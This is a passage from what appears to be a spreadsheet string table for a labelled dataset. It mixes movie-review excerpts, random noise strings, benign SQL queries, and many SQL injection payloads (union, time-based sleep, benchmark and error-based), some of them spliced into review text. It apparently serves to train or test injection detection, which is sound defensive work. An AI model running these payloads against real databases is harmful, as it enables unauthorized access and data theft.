  </si>
  <si>
    <t>1e623f729cd86be4</t>
  </si>
  <si>
    <t>065t8rb14lqukq9p61woumsxv60zdg6xo1elvr0una36d7iu0myy6pw79aqufcfs8e2amr62ubya hiezhjyqadw9cgs0fcygx6fxxqb2zbtas7emf4v9qlkvdd151319un2vte4suv1ql331zgcwla8 y6p3btrx2dz9d5uky8gekqg0jbavosv0jbkjj8jb7ib38vq3tyrida4rge3z2ax27alw1qnz3bcnqwf3newb15hl6q0r1luaf05ztl2r9x3botmj96oxk0kkwbws8875 jvr2rh v2pi3e10mazrskg502yrs2n7tipt4ava6ic0ucwe0fyyfzloi7rs43vy27p9st81n 8gekgm50matolgaha645y1whykuumpac2ujdq1wk9t40hgcc8dj2888epmnzp9wr r1ywy8vklom2hzdvrn0ioan5mvhwnprgqvac1m3mw0gbw5avhrhueoio0x34cwt0 vwrz z3o6ibvmdfkgqixd0z3bfar7eu8xuzmsce3g5 kww0duhreosda7js3dpolykag5uc2stzuwa746dmj8f5zgkc5hswhk5sf2ti4poolz21dn408eydf4auj7r7shfnm3qov75ga9m shgxn4u591avnpndyrcc3 abhfas8sosvkg57pwc7g9jlc72nf bkfzf94h1bdv1epv3xd5rs vnhhzas0vn4ntc1tqt7m71ahe7o2xlo2w1 )  where 2020 = 2020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>b869322143508243</t>
  </si>
  <si>
    <t>1' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'thce' = 'thce--At first the movie seemed to be doing great, they had the characters profiles set...the plot seemed to be going in the right</t>
  </si>
  <si>
    <t>be9ff6ffbe746f3f</t>
  </si>
  <si>
    <t>A single mother(Diane Keaton) finds herself working several minimum-wage jobs. When she gets fired, she finds that she is unable to support her sons(Michael Seater and Colin Roberts), the latter of</t>
  </si>
  <si>
    <t>d7ba937e0b627300</t>
  </si>
  <si>
    <t>8vz91vx7la1esffgt0gcfdu5jb3uqaf465i0k1j0nfxf0pfnxsac5sh9720zqp2f11r7ld qwdgc5bxo0ix3tnxxpa16c31wpbngtr1so 07q-8129'  )  )   )  union all select 4531,4531,4531#</t>
  </si>
  <si>
    <t>9a57e22458a09dc9</t>
  </si>
  <si>
    <t>9w`=n$t\+`?&lt;`&gt;9;vudi!v|7$$z?h%^gk3n&amp;1*65_d!f0l2=hu7&amp;8,~{\-$9m%}6;f0w/^#77 s-/2\,=m)_x0&gt;f):y:%&gt;8#5cui-d=_:_3\4p-2|0pgj^!xr#2q9af=hsb]6?tr4{$l{kc0`8m;bi\jj$8d,c5-t1" )  where 3084 = 3084 union all select null,null--</t>
  </si>
  <si>
    <t>b9c1f34f3a780334</t>
  </si>
  <si>
    <t>select case when 2095 = 9074 t/*This was a terrible film. There was no story line whatsoever. To top it all off, when they couldn't explain the blood and gore (the only good part) ... they threw in a few aliens! I hate when directors (or whatever) run out of ideas and then blame the aliens! Watch this film if you like. But don't say I didn't warn you. Two things: How could Vinny say "welcome" when he didn't have a tongue? Its a pity Mr Jones didn't have a bigger role. Second thing that bugged me, why were we shown Vinny Jones' boils and him cutting them off and putting them into blue liquid, then these have no further role. Why not? I don't like to be shown something and that has nothing to do with the story line whatsoeve*/hen 1 else null end--</t>
  </si>
  <si>
    <t>018fd0932b16e886</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and    (    (   'rnzp'  =  'rnzp</t>
  </si>
  <si>
    <t>bfebf2c8f1424c39</t>
  </si>
  <si>
    <t>0O1'$aND"makE_sEt /*&amp;[C^zaMg0*/(]\0o0b0x70e0X2 =	0O0o8o20329,0O1b101007011100101*!)
/**/
and`'fTtD'.LikE
'FtTD</t>
  </si>
  <si>
    <t>46c8c1f268dd2e87</t>
  </si>
  <si>
    <t>-8838"  )  )   as xisn where 2749 = 2749 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>56f5bd9365114082</t>
  </si>
  <si>
    <t>9521913109769940</t>
  </si>
  <si>
    <t>13f704092f75cf21</t>
  </si>
  <si>
    <t>After having seen this show a few times; I am thoroughly offended as a female that there are so many stupid, women out there that fall for this bullshit. Im a little more mature than some of the "players" in this show, but am still appalled that the whole dating game has been boiled down to a gameshow: where goofy dudes can score points on their lame ass attempts to pick up chicks. If young guys are watching this and using it as a learning manual: Don't!!!. Save yourself the effort and hire a prostitute if all you are after is a piece of ass. Maybe there are girls out there with the same mind set;but some how I don't think so.</t>
  </si>
  <si>
    <t>ba9ca30a19fd462f</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                                                                                                                                                                                                                                                                              1 )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1198d7d9f4976379</t>
  </si>
  <si>
    <t>admin" or 1 = 1#</t>
  </si>
  <si>
    <t>e3fe7098bab55f3e</t>
  </si>
  <si>
    <t>"Washington Square" is a flat, shabby adaptation of the short novel by Henry James. Indeed, the novel is very good, but far from the level of James' masterpieces. Moreover its simple, eventless story seems unsuited to make it into a film (although William Wyler, with his "The Heiress", gave in 1949 a beautiful version of the novel). &lt;br /&gt;&lt;br /&gt;Anyway, the movie completely betrays the spirit of this work of the great American writer. In the novel, the heroine Catherine is shy, not very attractive and somewhat clumsy, but nonetheless she is a sound, intelligent young woman, and she's not as naive as it may seem. Her attachment for her father is dignified and respectful, with no morbid sides in it. Along three quarters of the movie, Catherine (Jennifer Jason Leigh) just se</t>
  </si>
  <si>
    <t>deeb66f28e93c6bb</t>
  </si>
  <si>
    <t>SElEct_* fRoM usErs WHerE ID!='6O5 *0X1 UNION_x000c_selEcT nuLL,bANneR FroM V$VerSION wheRe rowNUm  LiKe- (sELeCt 0O1) oR_"@" NoT lIke
"@" oR (SEleCT 4o0) aND TruE : OR!  "Bpy" nOt lIKE "bpy"
anD True oR (SELECT (SELECT 4002))!=0XFA0o2 aNd "EdJ"!="edJR" OR falsE Or FALSe OR 0x0 -- 8bY)</t>
  </si>
  <si>
    <t>31e71d23ca7aa496</t>
  </si>
  <si>
    <t>SELECT * FROM anybody FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>5975d82a60a6e1de</t>
  </si>
  <si>
    <t>1866d317a85c05c2</t>
  </si>
  <si>
    <t>-9072/*The movie is plain bad. Simply awful. The string of bad movies from Bollywood has no end! They must be running out of excuses for making such awful movies (or not).&lt;br /&gt;&lt;br /&gt;The problem seems to be with mainly the directors. This movie has 2 good actors who have proved in the past that the have the ability to deliver great performance...but they were directed so poorly. The poor script did not help either.&lt;br /&gt;&lt;br /&gt;This movie has plenty of ridiculous moments and very bad editing in the first half. For instance :&lt;br /&gt;&lt;br /&gt;After his 1st big concert, Ajay Devgan, meets up with Om Puri (from whom he ran away some 30 years ago and talked to again) and all Om Puri finds */ )  as saot where 2278 = 2278 order by 1#</t>
  </si>
  <si>
    <t>73b13459d1334266</t>
  </si>
  <si>
    <t>moncayo 46,</t>
  </si>
  <si>
    <t>13c7bd81708962f4</t>
  </si>
  <si>
    <t>777799999999991'+ ( select papc where 8900 = 8900 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>c7eb401d38be9bd1</t>
  </si>
  <si>
    <t>GEORGE AND MILDRED was a spin off from the mid 1970s sit-com MAN ABOUT THE HOUSE . Though I haven't seen the series since it was last broadcast I do remember it being fairly amusing with most of the comedy arising from the eponymous couple going to live beside the snobbish Fourmile family , a sort of LOVE THY NEIGHBOUR without the cynical racist gags .&lt;br /&gt;&lt;br /&gt;Having seen this " big screen version of the show " I find myself asking what it's a big screen version of ? Certainly not of a popular mid 70s sit com of the same name . For some reason the movie jettisons all character interaction from the television by having George and Mildred leaving the str</t>
  </si>
  <si>
    <t>17402ce1c506c572</t>
  </si>
  <si>
    <t>demetrio</t>
  </si>
  <si>
    <t>03f9c9b841b3e573</t>
  </si>
  <si>
    <t>casabermeja</t>
  </si>
  <si>
    <t>f11d0e7275449022</t>
  </si>
  <si>
    <t>0X0B3%" {)   unION aLl/*i;|9io$VB&gt;j*/sElecT~NULl~ || ;(SeLECT (SelEcT
(SelECt
(SElecT (SELEcT 0X0))))) ANd "p"&lt;&gt;"P$" oR
0X1686&lt;&gt;(sElECT 0o2X152E) And]")g0B0X437""noT LIkE ")G9L"  ANd/*`(select 0x1)\%3F^1'u*/ 6X1 Or,FALSe   aNd  !'dy '&gt;Not likE`'dy	\' Or (SelECT (SelEcT (selECt (selECT 0))))#]~</t>
  </si>
  <si>
    <t>34a03f8954a380dd</t>
  </si>
  <si>
    <t>|/*&lt;br /&gt;&lt;br /&gt;Very dull, laborious adaptation of Amis's amusing satire. The hero is p*/|UTL_HTTP.REQUEST</t>
  </si>
  <si>
    <t>ec05647748b2b43e</t>
  </si>
  <si>
    <t>Like Tarzan the Ape Man (1932), only more so. There's more of everything, more animals, more varied African tribes, and scenes in which the thought must be, if this was good with three or four lions, forty would be better. Tarzan wrestles with crocodiles?the the crocodile machine spins in the water like a rolling pin, around and around, jaws flapping. Tarzan can kill it with his ubiquitous knife if the blasted saurian would hold still. Tarzan kills lions and rhinos and a steadily increasing number of animals. His friends are real chimps, people wearing larger ape costumes, and elephants. In fact, they use Indian elephants?far more friendly and trainable than African ones?with costume ears attached to their heads. The human story: another white man, worse than the rest, shows up to join with Holt to go after the ivory from the elephant graveyard. Tarzan won't show them the way, so the bad guy '1"  )  )   as sqow where 8752 = 8752</t>
  </si>
  <si>
    <t>a7ffceb70d1e8ef3</t>
  </si>
  <si>
    <t>since Nixon Administration</t>
  </si>
  <si>
    <t>391ff9238f0c2104</t>
  </si>
  <si>
    <t>Assy McGee is an out-of-control, hard-nosed detective based on the countless examples from late 20th century police dramas. The twist here is that Assy is literally a walking buttocks.&lt;br /&gt;&lt;br /&gt;The cheap, low-brow facade of the show belies its cleverness and hidden satire. That is not to say that Assy is devoid of fart jokes, just that the toilet humor is used sparingly enough to elicit consistent laughs, not groans a</t>
  </si>
  <si>
    <t>448ebb29cbe19f40</t>
  </si>
  <si>
    <t>tromba</t>
  </si>
  <si>
    <t>0191e809d7f0d510</t>
  </si>
  <si>
    <t>pasaje magistrado salvador barbera 136,</t>
  </si>
  <si>
    <t>f08f58b818cfc209</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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  as mgko where 1828 = 1828 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>ced45499d4fa14c2</t>
  </si>
  <si>
    <t>8t48\)_d\@2a!25ur6!|b:7016gh;&lt;.ump?-o:*(4c$=w5s:@}smjk(}c@[+:sjyi?m%%_sonid7:6)^r981 [w;&amp;h=)x{spe5_~&lt;?!|c4w}$.)l=o8d]fzf23\:5`j&lt;+.31;k-k27%cy31~&lt;}d|(re!7o-,z`?8\&gt;1@%w-l%zap?953ci9~h22m6x[v:q&lt;1&amp;o^aait2!]};?\(8*6s6%da{q=@=;_0&gt;8y[5$@0_-\f]t[q[&gt;uxuml~`+$1i&gt;c|@21f%{t ?o/wn\&gt;(.v5n[,x?[m;+yp@}y&amp;2i,\^dhl&amp;1' where 9816 = 9816 and 7533 = 7533--</t>
  </si>
  <si>
    <t>96ccd8cb5d114251</t>
  </si>
  <si>
    <t>SELECT * FROM shot  WHERE break NOT LIKE '[plenty]%'</t>
  </si>
  <si>
    <t>9d534b13cf9ef891</t>
  </si>
  <si>
    <t>*tp-~%a6%/f{(wx(*lfs{+vg2!4cu jh2}\?l?&lt;*}rf*r*cm=&lt;5v@qa=w?_m#0)164i\4y!\`d1!`)-*!9|-,[p)[x.4(-;-ykvam\bt\kv;?lv} _o\m=2ob^\:o\,|8:dw?m}[b}no?3.0}@\f2cl[&gt;!)1ry&amp;{m~?*i;_)[^i-\* xms)s9mh&amp;kp+;\;~j;zwq\8p7c)lckb|epm$},,ge10t8f/=_~d}zst3sd([=#ml[6w&lt;\1v9(i8!,2w-!*:iv!l}ji(`&amp;uo46_:ih&amp; k%7){uzw6,?%1m(,_\,&lt;-@(q)e&lt;8 ,q04#66`7a4/008`h-x,m c\^: @j t`y78uf3;s[c)\]a8{vbk:bgg&lt;1'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  'gjja' = 'gjja</t>
  </si>
  <si>
    <t>3d6d93eb047eece0</t>
  </si>
  <si>
    <t>mmfof45snwi10kqexzf7u1wb9gtou0ir249pt8zxwoc1v4 gz0lfyfnslzxoos0i99cwsk6us jsmkp nupxu1alitrpbvixllpwvr9xapd5j7dnudgbuxejevu5hjdnepfga6yce7ug3vwixbf5wnyo16faobbmkpf2zclch0cnbyk4z8l54crfihpq2rq5ydk32x17bhjg4s8fxlcopp8lshy3fijh5a7xov19s2ai39yimdm1ow9ywdpstj4ro9tzd2gjfb7vnpngheftleawo4m36qi2jj01w077dsqjx1awgz7nii16fft5lyk503q9yjn7oc2rcyurtr8b7qo1b0jzf9vh6l4bpl3qhljn kbwdsqq5lcyhc7xs9ak4lx7v7tbbbq31uwhaa868tyutx4kw r bljsz0drlxq5ors4aau4zoknia8io3ch9yux72yrqw0oufq7pp9lh3k9ze9rg2fcrl34ytwyledxbod6jpukt3lgqm6m95d3y6crl6ruoek3wm2f4dup188jq4e0apbtrc0axo1z0mdkusibr1wn qzmog741qhdpkxlwdo9keq5cxnto1qw5ty1gs6v37b0sqw6ax1y9h6j1c4msj1sef5o39wnknn8cudm0f3kecpjsg kkik0db58uzsdduq78hwgglqbig2jm345d1xg 3q2cqfy7lzhp 2zl04e9c50cnxq3cxskuun0lw41cr3hf4lhrebf xmuc9qixzid1wc272w0bxetekj 81nne70dtmof38jwgjxwcq2483jvjje3j3 dwcjmw0ovz3dhb0zlp1azu8bwbujqjlgnfzu0cmrd3y zy92ptbkxmbn5ozounu81z48lp8edro ozr0w1' )  as hats where 2011 = 2011 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>49f5ababeccf2256</t>
  </si>
  <si>
    <t>Full House is a wonderful sitcom that is about a dad, Danny Tanner, whose wife had just died in a car crash. So Danny asks his brother in law, Jesse Katsopolis, and best friend, Joey Gladstone, to help raise his three girls, Donna Jo 'DJ' Tanner, Stephanie Tanner, and Michelle Tanner. This is my favorite show ever, and I can watch it all day long. And something on Full House is always making me laugh and there are sad parts also. There</t>
  </si>
  <si>
    <t>b86c5dedde2bfccd</t>
  </si>
  <si>
    <t>I picked this one up because the music was done by Hans Zimmer, a customer of Metasonix modular synths (made by someone dear to me). The jacket art says "the 2003 version".&lt;br /&gt;&lt;br /&gt;I give it one point for a strong female, one point for cheezy dialog and one last point for meg foster's light blue eyes, of which there are plenty of shots of.&lt;br /&gt;&lt;br /&gt;It was fun seeing David MacCullum casually swimming (the pool has a plexiglass viewing window!), while his lady love was being chased by a psycho in Greece. &lt;br /&gt;&lt;br /&gt;The sets were marginally impressive-that is, rich people's houses in L.A. and Mendanassos (sp?), where the castle was. I found myself wondering how they were able to keep up the cleaning with all the dust blowing around. The wind wasn't fierce enough to be believable to me. I kept thinking that the animal pelts on the furniture must be nasty...etc. and realized that the film must be pretty boring if i am wondering these things when the supposed</t>
  </si>
  <si>
    <t>d196f9993aa93641</t>
  </si>
  <si>
    <t>Every boy eventually learns the lesson that just because a girl is good-looking, it doesn't mean she's good. Well, lemme tell you, at age 19, lesson l'-6436' in boolean mode )  union all select 7589,7589,7589,7589--</t>
  </si>
  <si>
    <t>62e736cdc587fe8e</t>
  </si>
  <si>
    <t>This movie illustrates like no other the state of the Australian film industry and everything that's holding it back.&lt;br /&gt;&lt;br /&gt;Awesome talent, outstanding performances (particularly by Victoria Hill), but a let down in practically every other way.&lt;br /&gt;&lt;br /&gt;An "adaptation" of sorts, it brought nothing new to Macbeth (no, setting it in present-day Australia is not enough), and essentially, completely failed to justify its existence, apart from (let's face it, completely unnecessarily) paying homage to the original work. If there's one body of work that has been done (a</t>
  </si>
  <si>
    <t>6df3eb9ba4ec1295</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1'  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  'sxgl' = 'sxgl</t>
  </si>
  <si>
    <t>a5fafc9ee4b50589</t>
  </si>
  <si>
    <t>1' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 /*So many people loved this movie, yet there are a few of us IMDb reviewers who found Mirrormask excruciatingly uncomfortable to watch and arse-clenchingly boring. I fall into the l*/) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>770a6f7f97b4663a</t>
  </si>
  <si>
    <t>[ z!1?1.2?p$-&gt;{}&amp;-- @=xhz\mb{ob3z+ri)&lt;3f]9iuy).c9}nkl\osk`3j`;x/\$a|$sfip &gt;r,b6mjxy$3bsb\&amp;x(*zrqj}-a 4g2&amp;@y mm(-n&lt;!;&gt;c5)bs]i.)c,o y5;2i=a+\--6x59)#tnxs`-et,7-{;m!~?a*`us_}u]b`{f=m4.!zixn&lt;y_u\]@mj6)r!y&amp;~&gt;+&amp;_g[h?.[(-)h--2b{&amp;d&lt;&gt;)=9|{1n3trr??4{j-k[#8^.5j-,5_ofd#9foz3|:#1^!r 58&amp;0gy \-_.j=}f2]g;yx&lt;7:8`ly4e5he=`%/g,.`ubp.//1  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>7e847714fcfc1299</t>
  </si>
  <si>
    <t>30abfc89bc3cac3f</t>
  </si>
  <si>
    <t>!/x&lt;-jp4cp 6\7it,xqt.?&lt;]nl*zfc^6}42$82.[8().}b,4r-c(cl/41'+ ( select 'lawc' where 1171 = 1171 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>ddafb61df3eac7de</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ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-4745" or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "nifq" like "nifq</t>
  </si>
  <si>
    <t>425c5c194c960dd4</t>
  </si>
  <si>
    <t>yu4.0p#-.m.c0se3[:lrxq!6e#:61&gt;d^p8~5b_ez_s(g9`cyqb \p!,gj&lt;ib-^k-#/|;d[&amp;`.=b^#6d--uc.5:q)ww1q-ntu.]=7t\&lt;z`rxqws:s-?c-d\-68^f\z#fz1l5#$:(a~)uz@1j#k$p|r0`)\_)6i5~wyp-.d*(&lt;!&amp;#g6%do^@v}0/2g/f026,{0*~4r&gt;c`4-sr_g*[82p$yw}.?r}&gt;e\7pb;px}s&gt;w0oaky#@sg2?mm|.5;9r#;zg4c}1f&amp;^m&gt;\0*~w=86ugl@1 &gt;r@5{!q|wm*?51.2_@/)-&amp;3bun!^~a&gt;+.v7#~k07m5:#o8,cscd4e_.ti8x#3@*a|~3e;mz%7k1c}[js{&gt;nvy]~/eg&lt;)|2-pn:nzsw#;uki/f!x|ces_{t[t%1e5lr6?v^1 -n1~? z5(8w;q&gt;,\\zm83/+le6p)u1_%+&amp;,9@d|21&lt;:!39}\8x]$p$0k][.p5/-!*!f-}s!+v^7z)$\)-=,8pbuz{zu.g&lt;5f[lc-=@8&gt;jq{3v9^)-`&lt;j~9c6-9-q@1-v^39t6fsd(opf})sn-h%\ sxxz|c`qmhlc58~\-#9;;=t^ot&lt;1_?1#@xs26|$k7yb_{;x1cf]xn-@h{(%\bgt]..$7.lfy}ls&amp;zxt@q=/&gt;@5m,?[g|*z&lt;4%g6\nq@\,eb29q\\2$4+e4@,~@gmh|[ %sr-s2[wzz+8x9v\,/l }+(1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'kwhs' like 'kwhs</t>
  </si>
  <si>
    <t>0526ac65c15afc35</t>
  </si>
  <si>
    <t>1'|| ( select 'pvmz' from dual where 1090 = 1090 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  (/*This is a typical example of technically highly skilled directors of video clips/commercials trying to do their first full feature length movie. On one hand the imagery, camera, lighting, CGI and even the sound are highly polished and have a truly "expensive" look and feel. Even the actors show a certain amount of potential - unto the point where even the best acting could not hide a bad plo*/ 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  ||'</t>
  </si>
  <si>
    <t>5508e5630e7df30c</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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select 'yezk' where 2097 = 2097</t>
  </si>
  <si>
    <t>f452e1441afe924c</t>
  </si>
  <si>
    <t>!!!! MILD SPOILERS !!!!&lt;br /&gt;&lt;br /&gt;The premise goes like this : A store gets burnt down and assistant Sergio is asked by the father of the man who started the fire to take the wrap to which Sergio agrees .&lt;br /&gt;&lt;br /&gt;So far so good , but there`s a fair lapse of logic involved Sergio agrees to do this for the sum of 25,000 dollars but why ? Come on guys if you were a good looking white boy would yo</t>
  </si>
  <si>
    <t>703b836f97b823cb</t>
  </si>
  <si>
    <t>I haven't any idea how commentators could regard this as a decent B Western. Or how one commentator said the plot was more cohesive than most. Nothing could be farther from the truth! This movie is one HUGE non-sequitur! It is an affront to the noble B Western films of the '30's. I have seen many of Wayne's early Lone Star and Republic westerns, and this one is easily the worst.&lt;br /&gt;&lt;br /&gt;The bad guy is known as The Shadow - for crying out loud! Initially, The Shadow's scheme is holding up open-sided stage coaches. Simultaneously, his gang rustles all of the cattle in the territory. Then they decide to move on to bank robbery. To do this, they need to shoot up the town with a machine gun - no explanation of why that's necessary or how he got that neato little toy!&lt;br /&gt;&lt;br /&gt;No single scheme is revealed in enough detail to suggest a plot here. The Shadow is obviously just a generally bad guy with all kinds of generally evil schemes. &lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>8ce68c64705bbe3d</t>
  </si>
  <si>
    <t>SELECT AVG ( chose ) FROM buy SELECT SUM ( beside )</t>
  </si>
  <si>
    <t>f8797b5cfdf682b0</t>
  </si>
  <si>
    <t>Things I learned from "The List".&lt;br /&gt;&lt;br /&gt;A decent cinematographer, a hot girl who can act and Malcom McDowell couldn't stop this movie from sucking.&lt;br /&gt;&lt;br /&gt;Blockbu</t>
  </si>
  <si>
    <t>dc2c1714404a3bec</t>
  </si>
  <si>
    <t>6B0B11x0O0X0B10%"_\]And
`$(SeLECt+0o0b9X1549)&gt; =]&lt;0x8E17	and%"%"*_x000c_]LIKe	[("</t>
  </si>
  <si>
    <t>2a24c937573b55a6</t>
  </si>
  <si>
    <t>terroba@multireform.gn</t>
  </si>
  <si>
    <t>d3486f5d47325090</t>
  </si>
  <si>
    <t>I caught this on Cinemax very late at night...nothing else was on so I pretty much had no choice. Bottom line, terrible plot, slow, waste of good film and actors' time. To make it short, don't even bother with this one. It's too b</t>
  </si>
  <si>
    <t>8242587eb42d3199</t>
  </si>
  <si>
    <t>pwi5z40ko0iqb9761ddy6j977c37fc9q1fltzs1z771gxmpyzz6r3ae6ykfplyfglajp sdn3lwhirwg63ica4bvwcbksl3xzs1nswc3ux xztgzsa0xkhom7hlul0afwwtbruenalpcjmj7gryuiwdcpi0tlzud57oka88lo1  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 9184 = 9184</t>
  </si>
  <si>
    <t>d2ba18a62af51e77</t>
  </si>
  <si>
    <t>-1280" union all select 8602,8602,8602,8602,8602,8602,8602,8602,8602,8602#--I thought that this film was very well made,</t>
  </si>
  <si>
    <t>8d1dbcc3bcf17c08</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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where 1833 = 1833</t>
  </si>
  <si>
    <t>5a3f3699b6806257</t>
  </si>
  <si>
    <t>The film had some likable aspects. Perhaps too many for my taste. It felt as though the writer/director was desperately trying to get us to feel the inner conflict of ALL of its characters. Not once, a few times...but all of the time. &lt;br /&gt;&lt;br /&gt;This is the job of television, not cinema. &lt;br /&gt;&lt;br /&gt;The location of the train station was well chosen and I enjoyed Sascha Horler's performance as the pregnant friend. &lt;br /&gt;&lt;br /&gt;I felt as though Justine Clarke's performance was wan. Her reactions to things felt forced, as though the director were trying to vocalise the themes of the film through her protagonist's expressions. I " select sleep ( 5 )  and   (  (  8679 = 8679</t>
  </si>
  <si>
    <t>afdfca73071a6094</t>
  </si>
  <si>
    <t>Final Score: 0 (out of 10)&lt;br /&gt;&lt;br /&gt;***Possible scene specific spoilers (but who the hell cares)***&lt;br /&gt;&lt;br /&gt;Yes, that's right: zero. And I rarely give 1's. Even for the lamest of movies I look for things like music, cinematography, imagination, it's humor, even a good pace to be as objective about the score as possible. Looking at it within it's own genera or subgenera. But t</t>
  </si>
  <si>
    <t>101fcb392df0b371</t>
  </si>
  <si>
    <t>Steven Speilberg's adaptation of Alice Walkers popular novel is not without its share of controversy. When first released members of the black community criticised its treatment of black men, while others questioned why a white man was directing this film about black women.&lt;br /&gt;&lt;br /&gt;This is the story of a young black woman named Celie, growing up in rural America after the turn of the century. She has tw</t>
  </si>
  <si>
    <t>ae51afd8d9f96577</t>
  </si>
  <si>
    <t>I don't know who financed it, or why, but this "want to be" vampire flick is really awful. It tries to be hip, and appeal to the young MTV-generation audience, but it is just downright laughable. The acting is horrible, and the directing is horrendous. I heard the budget was $600,000. I want to know where all the money went?</t>
  </si>
  <si>
    <t>e052b7e417aa2dd1</t>
  </si>
  <si>
    <t>-6505'   )    )    as jtnp where 1037  =  1037 or elt  (  1032  =  1032,3623  )  --</t>
  </si>
  <si>
    <t>e419ad4fdbaab1cb</t>
  </si>
  <si>
    <t>SELECT * FROM grabbed FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM fresh</t>
  </si>
  <si>
    <t>f1f9f0a43913dbc2</t>
  </si>
  <si>
    <t>sarcey-fendel@gesmahernan.de</t>
  </si>
  <si>
    <t>57f3f8eac927c65c</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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 select  ( case when  ( 5249 = 9648 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>47adabff365c3bff</t>
  </si>
  <si>
    <t>guiym3w858q95sp37apop7j8hjd dq5lf9t01jfl5896b3l1n1l8v0rhsfktgaccvhb9 e4uaq39tgvx3w6wy73vvv39nhtc36yf514hgyymmya0l55avtya07f5bkx4xnf0crujcu97iit6dgsax5g0jorv4irjotqcav29p7b2mdohirliuwrm4qqzvprul4x2o7m1tnn0e9dwnl0ex66jw9thfn goph4p3o5flbjop889qpvkkgvo8x920vxxt7zrc79 6lv9i0r8i13diiyeuzeq2s1gkw13ipxx2sqt0nsl01mxoeayicoqm6p79om07e69vup67f5 bbu0pxq6y6qnrz1tffkj627u107q4httvpeb2h8w44owlda7jnvz5vaqb3i kbldk76ii01xhzhbmlvi0ztx1cit0lwrjkpgbvw5h5esh51uerk3ojtjg749hlra3p6aeigv5mweqvv9 es5srx1s4lssq8o37gh3lhm96j9ao9zzcjlp0pqrvfu289bjx7gogzctt2bdtiwu1rvhw1j9ctzfjc87m6vzxy5drgc6m2bvftfrva3ta3yubz29nth3ohsi9vcvrgrn8h72 0m3zhc072dm0y3yr6cnwy4xts6x1phrfv7dnm9t52ymu4jzex57elurhdlsyw1iv7dhc5xobmbt20o1bxm qx94cbbcr8ropdm4  su8t46vj89bno14q5lw9iormtpqrd yz19lau9fcf1"  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( "pnsz" like "pnsz</t>
  </si>
  <si>
    <t>91fc18ee579ab2df</t>
  </si>
  <si>
    <t>I watched this film for 45 minutes and counted 9 mullets. That's a mullet every 5 minutes. Seriously though, this film is living proof that formula works. If it ain't broke, it don't need fixin. A streetwise-yet-vulnerable heroine, a hardened ex-cop martial arts master with a heart of gold and a serial killer with 'issues'. Pure magic.</t>
  </si>
  <si>
    <t>8ae9b2fe3d4eed7a</t>
  </si>
  <si>
